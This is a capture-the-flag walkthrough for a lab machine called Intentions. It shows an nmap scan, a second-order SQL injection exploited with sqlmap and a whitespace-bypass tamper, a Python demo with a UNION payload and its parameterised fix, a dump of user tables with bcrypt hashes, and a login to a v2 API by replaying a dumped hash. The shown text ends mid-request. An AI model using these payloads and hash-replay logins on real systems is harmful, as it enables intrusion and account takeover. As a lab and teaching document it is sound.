# Intentions

## Nmap scan

```
$ nmap -sC -sV -Pn -oN nmap 10.10.11.220
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-20 21:35 +08
Nmap scan report for 10.10.11.220
Host is up (0.043s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 47:d2:00:66:27:5e:e6:9c:80:89:03:b5:8f:9e:60:e5 (ECDSA)
|_  256 c8:d0:ac:8d:29:9b:87:40:5f:1b:b0:a4:1d:53:8f:f1 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Intentions
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.80 seconds
```

## Initial Access

### Second-order SQLi vulnerability

We will first save the request that fetches the user's feed to a file named `getfeed`.

```
$ echo 'GET /api/v1/gallery/user/feed HTTP/1.1
Host: 10.10.11.220                                              
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*                       
Accept-Language: en-US,en;q=0.5                                 
Accept-Encoding: gzip, deflate, br                              
X-Requested-With: XMLHttpRequest                                
X-XSRF-TOKEN: eyJpdiI6Im5yeW53UWtkaUVacEEveWZSSzJzdXc9PSIsInZhbHVlIjoidEVjNG8ySVpRODh6dFNUU0NEdmpSelBzMEMwNkdjbWM3TkV3aGJmVnd6ditoVXZsSHpSSnlQeThUYXM0T0w2eFMrTmgwNStDU2x0Y2hsRlR1MjVjS0NJb3hTdGs5a3VuOUFaVWlVaWozTFZRcUJDV2I2NmZxVXR4MVVNYzluYjIiLCJtYWMiOiIwZGE4MGIwZmI3YzBjNTNlN2NlODhlN2NmMDBlNDk5MTZmZDA1ODYyZWE3MjBmMjFmYTJjOGQyZmQ0MDk3MTI2IiwidGFnIjoiIn0=
Connection: close                                               
Referer: http://10.10.11.220/gallery                            
Cookie: XSRF-TOKEN=eyJpdiI6Im5yeW53UWtkaUVacEEveWZSSzJzdXc9PSIsInZhbHVlIjoidEVjNG8ySVpRODh6dFNUU0NEdmpSelBzMEMwNkdjbWM3TkV3aGJmVnd6ditoVXZsSHpSSnlQeThUYXM0T0w2eFMrTmgwNStDU2x0Y2hsRlR1MjVjS0NJb3hTdGs5a3VuOUFaVWlVaWozTFZRcUJDV2I2NmZxVXR4MVVNYzluYjIiLCJtYWMiOiIwZGE4MGIwZmI3YzBjNTNlN2NlODhlN2NmMDBlNDk5MTZmZDA1ODYyZWE3MjBmMjFmYTJjOGQyZmQ0MDk3MTI2IiwidGFnIjoiIn0%3D; intentions_session=eyJpdiI6IlNMRnFzcWtoeDlabnBIc1VkUUFTZ3c9PSIsInZhbHVlIjoiaytWNElJUGZDU0ZZMGo2MnVhQ2NwWERHVUJ0MElmY3dpTjhnajhCTC96bTNmSWZROCtYcXh0ZElOWmNKc2tpS1l4NERlMzM5NGFaNTJQVDZtTFk3R3Y3WFg3enhLNm9YcmxLMGRhVmRDdVNPQzk5eU5xR1g0VFNaOFpVeFpvKzgiLCJtYWMiOiJkNWUzYjU0YTUyODlkYjlkZmRiMGM3MWNkZTNiNWUyODVkMjQzM2IwMGE1NjY5MjQxZmQ4NjIwMThhNWZkMDcwIiwidGFnIjoiIn0%3D; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vMTAuMTAuMTEuMjIwL2FwaS92MS9hdXRoL2xvZ2luIiwiaWF0IjoxNzE2MTgzNDY4LCJleHAiOjE3MTYyMDUwNjgsIm5iZiI6MTcxNjE4MzQ2OCwianRpIjoiaENEWGdueUVJTW1ERWxydiIsInN1YiI6IjI4IiwicHJ2IjoiMjNiZDVjODk0OWY2MDBhZGIzOWU3MDFjNDAwODcyZGI3YTU5NzZmNyJ9.bqQSS2_Gr_xt52LiU0KqomfVlft16nbrmyE5mwFfqhE                                                         

' > getfeed
```

Then we will save the request that updates the user's feed genres to a file named `updatefeed`.

```
$ echo 'POST /api/v1/gallery/user/genres HTTP/1.1
Host: 10.10.11.220
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: application/json
X-XSRF-TOKEN: eyJpdiI6InBkMzkyYmQ3ZFFJazFPWFoxc0FIdVE9PSIsInZhbHVlIjoiaVAycUZEL29pVGlyb1JDcEwzTnA5TUFHTkpVMGZhRWxIbEZhQzlYT1Z2T0tJeGF5cjM1S1ZDZENTR1FMWUtEZS9oQWZWMXA1UlZrcFhNUURNUTJMaGxZdmRDbXhUTHVPd0xNaW0zOFF3K0lQRjR5N2VzSHFMbFViY203V2Nwb20iLCJtYWMiOiJlZjQyOWE5M2ZmOGM5OWFmYzY4OThhMWMyMzJjNDgwNDdlODg0MmQ0MTIwNTRlNTM0NmRmZmI2MjFhNDRlOGZkIiwidGFnIjoiIn0=
Content-Length: 17                  
Origin: http://10.10.11.220
Connection: close
Referer: http://10.10.11.220/gallery
Cookie: XSRF-TOKEN=eyJpdiI6InBkMzkyYmQ3ZFFJazFPWFoxc0FIdVE9PSIsInZhbHVlIjoiaVAycUZEL29pVGlyb1JDcEwzTnA5TUFHTkpVMGZhRWxIbEZhQzlYT1Z2T0tJeGF5cjM1S1ZDZENTR1FMWUtEZS9oQWZWMXA1UlZrcFhNUURNUTJMaGxZdmRDbXhUTHVPd0xNaW0zOFF3K0lQRjR5N2VzSHFMbFViY203V2Nwb20iLCJtYWMiOiJlZjQyOWE5M2ZmOGM5OWFmYzY4OThhMWMyMzJjNDgwNDdlODg0MmQ0MTIwNTRlNTM0NmRmZmI2MjFhNDRlOGZkIiwidGFnIjoiIn0%3D; intentions_session=eyJpdiI6ImpaY3MwMTdrbUJuUGlJc0dYZXA4MEE9PSIsInZhbHVlIjoiZDhaVEk2V2tSZEg1ZmY3cVZtOS9CL1dPK0JTMGpaZy9lbE9oNWxDZnlBZFlqd1hqVHRnUGc4OGY3eEVCbExrcFdkeDV2TUdwYmJua3RCd3JWaHArMnBQRisxaHFpMXd0a1NqUVFFUzgzN2lhR3F5eFd6cnJHYm9NN0ZxMFUyMVEiLCJtYWMiOiI2NjAxN2RkYWY5YzBlNTczOWEzYTMwZjYyMWJiZmM3ZGY3MTdhZTU4NWY5Mjc1ODMxODU1OTBmNzI0MzY4YjhiIiwidGFnIjoiIn0%3D; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vMTAuMTAuMTEuMjIwL2FwaS92MS9hdXRoL2xvZ2luIiwiaWF0IjoxNzE2MTgzNDY4LCJleHAiOjE3MTYyMDUwNjgsIm5iZiI6MTcxNjE4MzQ2OCwianRpIjoiaENEWGdueUVJTW1ERWxydiIsInN1YiI6IjI4IiwicHJ2IjoiMjNiZDVjODk0OWY2MDBhZGIzOWU3MDFjNDAwODcyZGI3YTU5NzZmNyJ9.bqQSS2_Gr_xt52LiU0KqomfVlft16nbrmyE5mwFfqhE

{"genres":"food"}' > updatefeed
```

Then we run sqlmap against the two saved requests: the update request is the injection point, and the feed request is where the stored value is used in a later query.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FiRkSjE3ghhZgJT8S1QyD%2Fimage.png?alt=media&#x26;token=ef5d3f14-705d-44c5-8437-81e40fffb39e" alt=""><figcaption></figcaption></figure>

However, we will encounter an error after running that command.

{% code overflow="wrap" %}

```
[21:56:23] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
```

{% endcode %}

If we look at the stored value after each update, we notice that all whitespace is removed: `food, travel`, for example, is stored as `food,travel`. Any payload containing spaces is therefore mangled before it reaches the second query. We can counter this with sqlmap's `--tamper=space2comment`, which replaces every space with an inline `/**/` comment that MySQL ignores.
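To make the second-order mechanics concrete, the following Python script is an added example and not part of the original writeup or of the Intentions application. The schema, the comma-joined `IN (...)` feed query and the whitespace-stripping write handler are assumptions that model the behaviour observed above, and the sample rows are constructed. It shows why the write request alone looks clean to sqlmap, why a payload with spaces breaks while the `/**/` variant survives, and how binding one placeholder per genre removes the problem.

```python
import re
import sqlite3

# Constructed sample rows standing in for the two tables the feed query touches
# (column names follow the sqlmap dump above, the data is made up).
GALLERY_ROWS = [
    ("food", "public/food/anto-meneghini-sJ4ix9_AjAc-unsplash.jpg"),
    ("food", "public/food/dan-9-f4enU0AY0-unsplash.jpg"),
    ("nature", "public/nature/laura-adai-mxGR7FogG10-unsplash.jpg"),
]
USER_ROWS = [
    (1, "steve@intentions.htb", "food,travel,nature"),
    (28, "test@test.com", "food"),
]

# A space-separated payload, and the same payload after sqlmap's space2comment tamper.
PAYLOAD_SPACES = "food') UNION SELECT email FROM users WHERE ('1'='1"
PAYLOAD_COMMENTS = PAYLOAD_SPACES.replace(" ", "/**/")


def build_db():
    """In-memory SQLite stand-in for the MySQL database (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, genres TEXT);
        CREATE TABLE gallery_images (id INTEGER PRIMARY KEY AUTOINCREMENT, genre TEXT, file TEXT);
        """
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USER_ROWS)
    conn.executemany("INSERT INTO gallery_images (genre, file) VALUES (?, ?)", GALLERY_ROWS)
    return conn


def store_genres(conn, user_id, raw):
    """First request (POST .../genres): whitespace is stripped, then the value is
    written with a bound parameter. This request is not injectable on its own."""
    cleaned = re.sub(r"\s+", "", raw)
    conn.execute("UPDATE users SET genres = ? WHERE id = ?", (cleaned, user_id))
    conn.commit()
    return cleaned


def feed_vulnerable(conn, user_id):
    """Second request (GET .../feed): the stored genres are trusted and spliced into SQL.
    The injection fires here, one request after the attacker-controlled write."""
    (genres,) = conn.execute("SELECT genres FROM users WHERE id = ?", (user_id,)).fetchone()
    quoted = ",".join(f"'{g}'" for g in genres.split(","))
    sql = f"SELECT file FROM gallery_images WHERE genre IN ({quoted})"
    return [row[0] for row in conn.execute(sql)]


def feed_safe(conn, user_id):
    """Hardened feed: one placeholder per genre, so stored text is data, never syntax."""
    (genres,) = conn.execute("SELECT genres FROM users WHERE id = ?", (user_id,)).fetchone()
    values = genres.split(",")
    placeholders = ",".join("?" for _ in values)
    sql = f"SELECT file FROM gallery_images WHERE genre IN ({placeholders})"
    return [row[0] for row in conn.execute(sql, values)]


def run_feed(conn, user_id, payload, handler):
    """Store a payload for the user, then fetch the feed. Returns the rows, or the
    database error text when the spliced SQL no longer parses."""
    store_genres(conn, user_id, payload)
    try:
        return handler(conn, user_id)
    except sqlite3.OperationalError as exc:
        return f"error: {exc}"


if __name__ == "__main__":
    db = build_db()
    print(store_genres(db, 28, "food, travel"))                 # whitespace removed, as observed
    print(run_feed(db, 28, PAYLOAD_SPACES, feed_vulnerable))    # syntax error: the spaces were stripped
    print(run_feed(db, 28, PAYLOAD_COMMENTS, feed_vulnerable))  # rows from users leak into the feed
    print(run_feed(db, 28, PAYLOAD_COMMENTS, feed_safe))        # []: no genre matches the literal string
```

The lesson for the defender is the same one sqlmap's first run hides: stripping whitespace is not sanitisation, and a parameterised write does nothing for a read that later concatenates the stored value. Every query that consumes stored user data has to bind it as a parameter.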

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FdPEBHZRnondRTq6YuUa7%2Fimage.png?alt=media&#x26;token=cc5d97aa-3172-4210-ad5c-fd6ba0735407" alt=""><figcaption></figcaption></figure>

With the tamper script in place, sqlmap detects that the backend database is MySQL.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FsvrQkYP2oS1n2JH7ExKy%2Fimage.png?alt=media&#x26;token=696696a6-a5be-4669-b52e-3a48b2c83c71" alt=""><figcaption></figcaption></figure>

Next, we will dump all the data in the database.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FqDDWHQDjLEGlPDxAbinl%2Fimage.png?alt=media&#x26;token=c0509cae-a16c-42b8-adbc-734b03ac5abd" alt=""><figcaption></figcaption></figure>

We will see that there are 4 different tables in the database.

The first table is `migrations`.

```
Database: intentions
Table: migrations
[4 entries]
+----+-------+-------------------------------------------------------+
| id | batch | migration                                             |
+----+-------+-------------------------------------------------------+
| 1  | 1     | 2014_10_12_000000_create_users_table                  |
| 2  | 1     | 2019_12_14_000001_create_personal_access_tokens_table |
| 3  | 1     | 2023_02_01_014219_create_gallery_image_table          |
| 4  | 1     | 2023_02_02_014532_add_users_admin_column              |
+----+-------+-------------------------------------------------------+
```

The second table is `users`.

```
Database: intentions
Table: users
[28 entries]
+----+-------------------------------+--------------------------+--------------------------------+---------+--------------------------------------------------------------+---------------------+---------------------+
| id | email                         | name                     | genres                         | admin   | password                                                     | created_at          | updated_at          |
+----+-------------------------------+--------------------------+--------------------------------+---------+--------------------------------------------------------------+---------------------+---------------------+
| 1  | steve@intentions.htb          | steve                    | food,travel,nature             | 1       | $2y$10$M/g27T1kJcOpYOfPqQlI3.YfdLIwr3EWbzWOLfpoTtjpeMqpp4twa | 2023-02-02 17:43:00 | 2023-02-02 17:43:00 |
| 2  | greg@intentions.htb           | greg                     | food,travel,nature             | 1       | $2y$10$95OR7nHSkYuFUUxsT1KS6uoQ93aufmrpknz4jwRqzIbsUpRiiyU5m | 2023-02-02 17:44:11 | 2023-02-02 17:44:11 |
| 3  | hettie.rutherford@example.org | Melisa Runolfsson        | food,travel,nature             | 0       | $2y$10$bymjBxAEluQZEc1O7r1h3OdmlHJpTFJ6CqL1x2ZfQ3paSf509bUJ6 | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 4  | nader.alva@example.org        | Camren Ullrich           | food,travel,nature             | 0       | $2y$10$WkBf7NFjzE5GI5SP7hB5/uA9Bi/BmoNFIUfhBye4gUql/JIc/GTE2 | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 5  | jones.laury@example.com       | Mr. Lucius Towne I       | food,travel,nature             | 0       | $2y$10$JembrsnTWIgDZH3vFo1qT.Zf/hbphiPj1vGdVMXCk56icvD6mn/ae | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 6  | wanda93@example.org           | Jasen Mosciski           | food,travel,nature             | 0       | $2y$10$oKGH6f8KdEblk6hzkqa2meqyDeiy5gOSSfMeygzoFJ9d1eqgiD2rW | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 7  | mwisoky@example.org           | Monique D'Amore          | food,travel,nature             | 0       | $2y$10$pAMvp3xPODhnm38lnbwPYuZN0B/0nnHyTSMf1pbEoz6Ghjq.ecA7. | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 8  | lura.zieme@example.org        | Desmond Greenfelder      | food,travel,nature             | 0       | $2y$10$.VfxnlYhad5YPvanmSt3L.5tGaTa4/dXv1jnfBVCpaR2h.SDDioy2 | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 9  | pouros.marcus@example.net     | Mrs. Roxanne Raynor      | food,travel,nature             | 0       | $2y$10$UD1HYmPNuqsWXwhyXSW2d.CawOv1C8QZknUBRgg3/Kx82hjqbJFMO | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 10 | mellie.okon@example.com       | Rose Rutherford          | food,travel,nature             | 0       | $2y$10$4nxh9pJV0HmqEdq9sKRjKuHshmloVH1eH0mSBMzfzx/kpO/XcKw1m | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 11 | trace94@example.net           | Dr. Chelsie Greenholt I  | food,travel,nature             | 0       | $2y$10$by.sn.tdh2V1swiDijAZpe1bUpfQr6ZjNUIkug8LSdR2ZVdS9bR7W | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 12 | kayleigh18@example.com        | Prof. Johanna Ullrich MD | food,travel,nature             | 0       | $2y$10$9Yf1zb0jwxqeSnzS9CymsevVGLWIDYI4fQRF5704bMN8Vd4vkvvHi | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 13 | tdach@example.com             | Prof. Gina Brekke        | food,travel,nature             | 0       | $2y$10$UnvH8xiHiZa.wryeO1O5IuARzkwbFogWqE7x74O1we9HYspsv9b2. | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 14 | lindsey.muller@example.org    | Jarrett Bayer            | food,travel,nature             | 0       | $2y$10$yUpaabSbUpbfNIDzvXUrn.1O8I6LbxuK63GqzrWOyEt8DRd0ljyKS | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 15 | tschmidt@example.org          | Macy Walter              | food,travel,nature             | 0       | $2y$10$01SOJhuW9WzULsWQHspsde3vVKt6VwNADSWY45Ji33lKn7sSvIxIm | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 16 | murray.marilie@example.com    | Prof. Devan Ortiz DDS    | food,travel,nature             | 0       | $2y$10$I7I4W5pfcLwu3O/wJwAeJ.xqukO924Tx6WHz1am.PtEXFiFhZUd9S | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 17 | barbara.goodwin@example.com   | Eula Shields             | food,travel,nature             | 0       | $2y$10$0fkHzVJ7paAx0rYErFAtA.2MpKY/ny1.kp/qFzU22t0aBNJHEMkg2 | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 18 | maggio.lonny@example.org      | Mariano Corwin           | food,travel,nature             | 0       | $2y$10$p.QL52DVRRHvSM121QCIFOJnAHuVPG5gJDB/N2/lf76YTn1FQGiya | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 19 | chackett@example.org          | Madisyn Reinger DDS      | food,travel,nature             | 0       | $2y$10$GDyg.hs4VqBhGlCBFb5dDO6Y0bwb87CPmgFLubYEdHLDXZVyn3lUW | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 20 | layla.swift@example.net       | Jayson Strosin           | food,travel,nature             | 0       | $2y$10$Gy9v3MDkk5cWO40.H6sJ5uwYJCAlzxf/OhpXbkklsHoLdA8aVt3Ei | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 21 | rshanahan@example.net         | Zelda Jenkins            | food,travel,nature             | 0       | $2y$10$/2wLaoWygrWELes242Cq6Ol3UUx5MmZ31Eqq91Kgm2O8S.39cv9L2 | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 22 | shyatt@example.com            | Eugene Okuneva I         | food,travel,nature             | 0       | $2y$10$k/yUU3iPYEvQRBetaF6GpuxAwapReAPUU8Kd1C0Iygu.JQ/Cllvgy | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 23 | sierra.russel@example.com     | Mrs. Rhianna Hahn DDS    | food,travel,nature             | 0       | $2y$10$0aYgz4DMuXe1gm5/aT.gTe0kgiEKO1xf/7ank4EW1s6ISt1Khs8Ma | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 24 | ferry.erling@example.com      | Viola Vandervort DVM     | food,travel,nature             | 0       | $2y$10$iGDL/XqpsqG.uu875Sp2XOaczC6A3GfO5eOz1kL1k5GMVZMipZPpa | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 25 | beryl68@example.org           | Prof. Margret Von Jr.    | food,travel,nature             | 0       | $2y$10$stXFuM4ct/eKhUfu09JCVOXCTOQLhDQ4CFjlIstypyRUGazqmNpCa | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 26 | ellie.moore@example.net       | Florence Crona           | food,travel,nature             | 0       | $2y$10$NDW.r.M5zfl8yDT6rJTcjemJb0YzrJ6gl6tN.iohUugld3EZQZkQy | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 27 | littel.blair@example.org      | Tod Casper               | food,travel,nature             | 0       | $2y$10$S5pjACbhVo9SGO4Be8hQY.Rn87sg10BTQErH3tChanxipQOe9l7Ou | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 28 | test@test.com                 | test                     | food')/**/__REFLECTED_VALUE__# | 0       | $2y$10$rCnbQrTOzNmkqeN1vrJcgOe7OgtRNh6bMK0ZEPfnMF9i0rat9uOCa | 2024-05-20 05:37:41 | 2024-05-20 06:00:52 |
+----+-------------------------------+--------------------------+--------------------------------+---------+--------------------------------------------------------------+---------------------+---------------------+
```

The third table is `gallery_images`.

```
Database: intentions
Table: gallery_images
[19 entries]
+----+--------------+---------------------------------------------------------------+---------------------+---------------------+
| id | genre        | file                                                          | created_at          | updated_at          |
+----+--------------+---------------------------------------------------------------+---------------------+---------------------+
| 1  | animals      | public/animals/ashlee-w-wv36v9TGNBw-unsplash.jpg              | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 2  | animals      | public/animals/dickens-lin-Nr7QqJIP8Do-unsplash.jpg           | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 3  | animals      | public/animals/dickens-lin-tycqN7-MY1s-unsplash.jpg           | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 4  | animals      | public/animals/jevgeni-fil-rz2Nh0U8vws-unsplash.jpg           | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 5  | animals      | public/animals/kristin-o-karlsen-u8aXoDEcDR0-unsplash.jpg     | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 6  | architecture | public/architecture/axp-photography-EU1sTG7DGxE-unsplash.jpg  | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 7  | architecture | public/architecture/k-t-francis-kHm0iLOj2zg-unsplash.jpg      | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 8  | architecture | public/architecture/leopold-baskarad-BcIr38tPxJ8-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 9  | architecture | public/architecture/nico-baum-LudJh7dPfv4-unsplash.jpg        | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 10 | food         | public/food/anto-meneghini-sJ4ix9_AjAc-unsplash.jpg           | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 11 | food         | public/food/dan-9-f4enU0AY0-unsplash.jpg                      | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 12 | food         | public/food/fatemeh-rz--RqVu65QrTM-unsplash.jpg               | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 13 | food         | public/food/jonathan-borba-BMpBW2476wQ-unsplash.jpg           | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 14 | food         | public/food/rod-long--LMw-y4gxac-unsplash.jpg                 | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 15 | nature       | public/nature/edoardo-botez-rm8q_Gy2iJs-unsplash.jpg          | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 16 | nature       | public/nature/laura-adai-mxGR7FogG10-unsplash.jpg             | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 17 | nature       | public/nature/marek-piwnicki-urmnC74otpA-unsplash.jpg         | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 18 | nature       | public/nature/marek-piwnicki-VOv4uaMf9E4-unsplash.jpg         | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 19 | nature       | public/nature/rafael-garcin-GsQ0iSb88HY-unsplash.jpg          | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
+----+--------------+---------------------------------------------------------------+---------------------+---------------------+
```

The last table is `personal_access_tokens`.

```
Database: intentions
Table: personal_access_tokens
[0 entries]
+----+--------------+-------+--------+-----------+------------+------------+--------------+----------------+
| id | tokenable_id | token | name   | abilities | created_at | updated_at | last_used_at | tokenable_type |
+----+--------------+-------+--------+-----------+------------+------------+--------------+----------------+
+----+--------------+-------+--------+-----------+------------+------------+--------------+----------------+
```

We only care about the 2 admin users (`steve` and `greg`) in the `users` table.

However, the password hashes do not seem to be crackable, so we will look for another way to use them.

### Hidden API path

Further enumeration of the web server turns up an `admin.js` file.

```
$ feroxbuster -u http://10.10.11.220 -x js,html,php,txt
                                                                                                                                                                                                                  
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.11.220
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [js, html, php, txt]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       36l      123w     6609c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        7l       10w      162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        1l        3w       16c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        7l       12w      178c http://10.10.11.220/css => http://10.10.11.220/css/
301      GET        7l       12w      178c http://10.10.11.220/js => http://10.10.11.220/js/
302      GET       12l       22w      322c http://10.10.11.220/logout => http://10.10.11.220
302      GET       12l       22w      322c http://10.10.11.220/admin => http://10.10.11.220
200      GET        2l     5429w   279176c http://10.10.11.220/js/login.js
200      GET        2l     2249w   153684c http://10.10.11.220/js/mdb.js
200      GET       63l     3842w   411821c http://10.10.11.220/css/app.css
200      GET       39l       94w     1523c http://10.10.11.220/
200      GET        2l     6382w   311246c http://10.10.11.220/js/admin.js

```

Searching that file for the keyword `password`, we come across this developer comment.

{% code overflow="wrap" %}

```
\n                Hey team, I've deployed the v2 API to production and have started using it in the admin section. \n                Let me know if you spot any bugs. \n                This will be a major security upgrade for our users, passwords no longer need to be transmitted to the server in clear text! \n                By hashing the password client side there is no risk to our users as BCrypt is basically uncrackable.\n                This should take care of the concerns raised by our users regarding our lack of HTTPS connection.\n            
```

{% endcode %}

So we check whether the same API paths exist under `v2`, and they do.

```
$ gobuster dir -u http://10.10.11.220/api/v2/auth -w /usr/share/seclists/Discovery/Web-Content/big.txt -o sec-list-gobuster -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.220/api/v2/auth
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.bashrc              (Status: 403) [Size: 162]
/.cvs                 (Status: 403) [Size: 162]
/.bash_history        (Status: 403) [Size: 162]
/.forward             (Status: 403) [Size: 162]
/.history             (Status: 403) [Size: 162]
/.cvsignore           (Status: 403) [Size: 162]
/.git                 (Status: 403) [Size: 162]
/.htpasswd            (Status: 403) [Size: 162]
/.htaccess            (Status: 403) [Size: 162]
/.profile             (Status: 403) [Size: 162]
/.listing             (Status: 403) [Size: 162]
/.perf                (Status: 403) [Size: 162]
/.passwd              (Status: 403) [Size: 162]
/.subversion          (Status: 403) [Size: 162]
/.ssh                 (Status: 403) [Size: 162]
/.svn                 (Status: 403) [Size: 162]
/.rhosts              (Status: 403) [Size: 162]
/.web                 (Status: 403) [Size: 162]
/login                (Status: 405) [Size: 825]
/logout               (Status: 405) [Size: 825]
/refresh              (Status: 500) [Size: 6615]
/register             (Status: 405) [Size: 825]
/user                 (Status: 302) [Size: 322] [--> http://10.10.11.220]
Progress: 20476 / 20477 (100.00%)
===============================================================
Finished
===============================================================
```

A POST request without a body fails, because both the `email` and `hash` parameters are required.

```
$ curl -X POST http://10.10.11.220/api/v2/auth/login                            
{"status":"error","errors":{"email":["The email field is required."],"hash":["The hash field is required."]}}
```

Following the guide below on sending a POST request with curl, we are able to authenticate as `steve` using the hash dumped from the database.

{% embed url="https://reqbin.com/req/c-g5d14cew/curl-post-example" %}

```
$ curl -X POST -d 'email=steve@intentions.htb&hash=$2y$10$M/g27T1kJcOpYOfPqQlI3.YfdLIwr3EWbzWOLfpoTtjpeMqpp4twa' http://10.10.11.220/api/v2/auth/login 
{"status":"success","name":"steve"}
```

So, we repeat the login from the browser against the `v2` API, sending the same hash in the `hash` field.

```
POST /api/v2/auth/login HTTP/1.1
Host: 10.10.11.220
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: application/json
